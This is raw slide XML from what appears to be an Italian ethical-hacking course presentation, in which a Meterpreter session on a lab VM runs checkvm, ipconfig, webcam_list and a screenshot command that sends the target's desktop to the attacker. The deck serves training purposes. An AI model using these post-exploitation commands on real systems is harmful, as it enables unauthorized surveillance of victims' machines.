        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13749608" y="2877726"/>
            <a:ext cx="3068654" cy="996034"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="996034" w="3068654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3068655" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3068655" y="996034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9960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true" rot="-1233514">
            <a:off x="5960717" y="5469294"/>
            <a:ext cx="2498557" cy="1218047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1218047" w="2498557">
                <a:moveTo>
                  <a:pt x="0" y="1218046"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2498558" y="1218046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1218046"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="2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8" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="184501" y="2702729"/>
            <a:ext cx="6242705" cy="4635085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Da Meterpreter faremo partire dei comandi per ottenere delle informazioni sulla macchina target. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per prima cosa, controlleremo se la macchina è una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>VM oppure una macchina fisica. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con lo script di meterpreter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3242"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2316">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>run post/windows/gather/checkvm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>vediamo che il target è una macchina virtuale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Poi useremo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ipconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per vedere la struttura di rete del target. Così facendo ci viene restituito l’indirizzo IP appartenente al target.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="584839"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3.3 - FASE DI TEST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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95453" y="196351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256635" y="-194070"/>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008194" y="557141"/>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17" id="17"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 18" id="1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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8445634" y="1454523"/>
            <a:ext cx="8556967" cy="1942373"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1942373" w="8556967">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8556967" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8556967" y="1942373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1942373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-7387" r="-5310" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11047574" y="4327003"/>
            <a:ext cx="6644714" cy="4931297"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4931297" w="6644714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6644714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6644714" y="4931297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4931297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="4404233">
            <a:off x="8885424" y="4147468"/>
            <a:ext cx="2534758" cy="1299063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1299063" w="2534758">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2534758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2534758" y="1299063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>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3" id="23"/>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4" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="184501" y="3385670"/>
            <a:ext cx="6242705" cy="3262215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>infine, controlliamo se ci sono delle webcam connesse alla VM con il comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>webcam_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Vediamo come</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>non sono presenti webcam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2822"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2962"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L’ultimo comando che effettueremo sarà il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>che ci restituisce uno screenshot della macchina target, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>in questo caso del desktop e viene salvato sulla nostra macchina attaccante.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2116">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="584839"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3.3 - FASE DI TEST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-1595614">
            <a:off x="5946061" y="1548909"/>
            <a:ext cx="2534758" cy="1299063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1299063" w="2534758">
                <a:moveTo>
                  <a:pt x="0" y="1299063"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2534758" y="1299063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2534758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299063"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="996477" y="5057775"/>
            <a:ext cx="15381560" cy="811530"/>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4.0 - Considerazioni Finali</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d"/>
  </p:transition>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810394" y="-1590418"/>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6" id="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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2342294" y="1503014"/>
            <a:ext cx="12696155" cy="6980810"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3343843" cy="1838567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3343843" cy="1838567"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1838567" w="3343843">
                  <a:moveTo>
                    <a:pt x="15245" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3328599" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3332642" y="0"/>
                    <a:pt x="3336519" y="1606"/>
                    <a:pt x="3339378" y="4465"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3342237" y="7324"/>
                    <a:pt x="3343843" y="11201"/>
                    <a:pt x="3343843" y="15245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3343843" y="1823323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3343843" y="1827366"/>
                    <a:pt x="3342237" y="1831243"/>
                    <a:pt x="3339378" y="1834102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3336519" y="1836961"/>
                    <a:pt x="3332642" y="1838567"/>
                    <a:pt x="3328599" y="1838567"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15245" y="1838567"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11201" y="1838567"/>
                    <a:pt x="7324" y="1836961"/>
                    <a:pt x="4465" y="1834102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1606" y="1831243"/>
                    <a:pt x="0" y="1827366"/>
                    <a:pt x="0" y="1823323"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="15245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11201"/>
                    <a:pt x="1606" y="7324"/>
                    <a:pt x="4465" y="4465"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7324" y="1606"/>
                    <a:pt x="11201" y="0"/>
                    <a:pt x="15245" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 12" id="12"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3343843" cy="1886192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3079"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3112856" y="1819616"/>
            <a:ext cx="11257075" cy="6533374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2861">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Tutte le vulnerabilità e i tool visti e usati nel corso di questa settimana si sono rivelati utili nel capire quanti possibili metodi di ricognizione e attacco sono a disposizione di malintenzionati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2861">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2861">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Inoltre, sono stati utili per comprendere come un hacker agisce e struttura i propri piani di attacco in base a ciò che trova davanti, che sia una web app o una macchina. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2861">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Comprendere la mentalità e l’arsenale a disposizione di un attaccante è imprescindibile per ogni ethical hacker che mira a salvaguardare l’interesse dei propri clienti. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4131"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 14" id="14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1303182" y="2670255"/>
            <a:ext cx="1706401" cy="1761446"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1761446" w="1706401">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1706401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1706401" y="1761446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1761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235615" y="5327946"/>
            <a:ext cx="2085909" cy="1433589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1433589" w="2085909">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2085909" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085909" y="1433588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14335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847186" y="7617500"/>
            <a:ext cx="1894703" cy="1470979"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1470979" w="1894703">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1894703" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894703" y="1470979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14709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303182"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CONSIDERAZIONI FINALI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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34202" y="0"/>
            <a:ext cx="5594531" cy="4868819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4868819" w="5594531">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5594531" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5594531" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-48012" t="-57743" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="13007398" y="5837654"/>
            <a:ext cx="5594531" cy="4868819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4868819" w="5594531">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5594530" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5594530" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-48012" t="-57743" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="40115" y="238125"/>
            <a:ext cx="20900465" cy="13062790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="13062790" w="20900465">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20900465" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20900465" y="13062790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13062790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="24000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
